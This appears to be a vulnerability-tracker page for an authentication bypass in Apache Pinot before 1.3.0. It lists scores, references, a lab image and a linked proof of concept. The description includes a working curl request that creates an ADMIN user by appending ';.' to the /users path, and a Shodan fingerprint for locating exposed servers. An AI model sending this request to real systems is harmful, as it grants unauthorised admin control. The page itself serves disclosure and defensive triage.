CVE-2024-56325

CRITICAL NUCLEI LAB

Apache Pinot < 1.3.0 - Authentication Bypass via Path Manipulation

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-56325. PoCs published by exploitintel. A Nuclei detection template is also available.

AI-analyzed exploit summary The repository contains functional exploit code demonstrating an authentication bypass vulnerability in Apache Pinot via matrix parameter injection. The PoC scripts bypass authentication by appending a matrix parameter containing a dot (e.g., `;.`) to API endpoints, allowing unauthenticated access to create admin users and exfiltrate data.

Description

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.

Exploits (1)

github WORKING POC 3 stars
by exploitintel · cpoc
https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2024-56325

The repository contains functional exploit code demonstrating an authentication bypass vulnerability in Apache Pinot via matrix parameter injection. The PoC scripts bypass authentication by appending a matrix parameter containing a dot (e.g., `;.`) to API endpoints, allowing unauthenticated access to create admin users and exfiltrate data.

Classification
Working Poc 100%
Attack Type
Auth Bypass
Complexity
Trivial
Reliability
Reliable
Target: Apache Pinot < 1.3.0
No auth needed
Prerequisites: Docker with Compose plugin · Network access to build/pull images
devstral-2 · analyzed Apr 09, 2026 Full analysis →

Nuclei Templates (1)

Apache Pinot < 1.3.0 - Authentication Bypass
CRITICALVERIFIEDby iamnoooob,rootxharsh,pdresearch
Shodan: http.favicon.hash:1696974531

References (2)

Core 2
Core References
Mailing List, Third Party Advisory
http://www.openwall.com/lists/oss-security/2025/03/27/8
Mailing List, Vendor Advisory vendor-advisory
https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v

Scores

CVSS v3 9.8
EPSS 0.2037
EPSS Percentile 95.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact total

Lab Environment

EIP LAB
Docker Lab
broker docker pull ghcr.io/exploitintel/cve-2024-56325-broker:latest

Details

CWE
CWE-288
Status published
Products (4)
apache/pinot < 1.3.0
org.apache.pinot/pinot-broker 0 - 1.3.0Maven
org.apache.pinot/pinot-common 0 - 1.3.0Maven
org.apache.pinot/pinot-controller 0 - 1.3.0Maven
Published Apr 01, 2025
Tracked Since Feb 18, 2026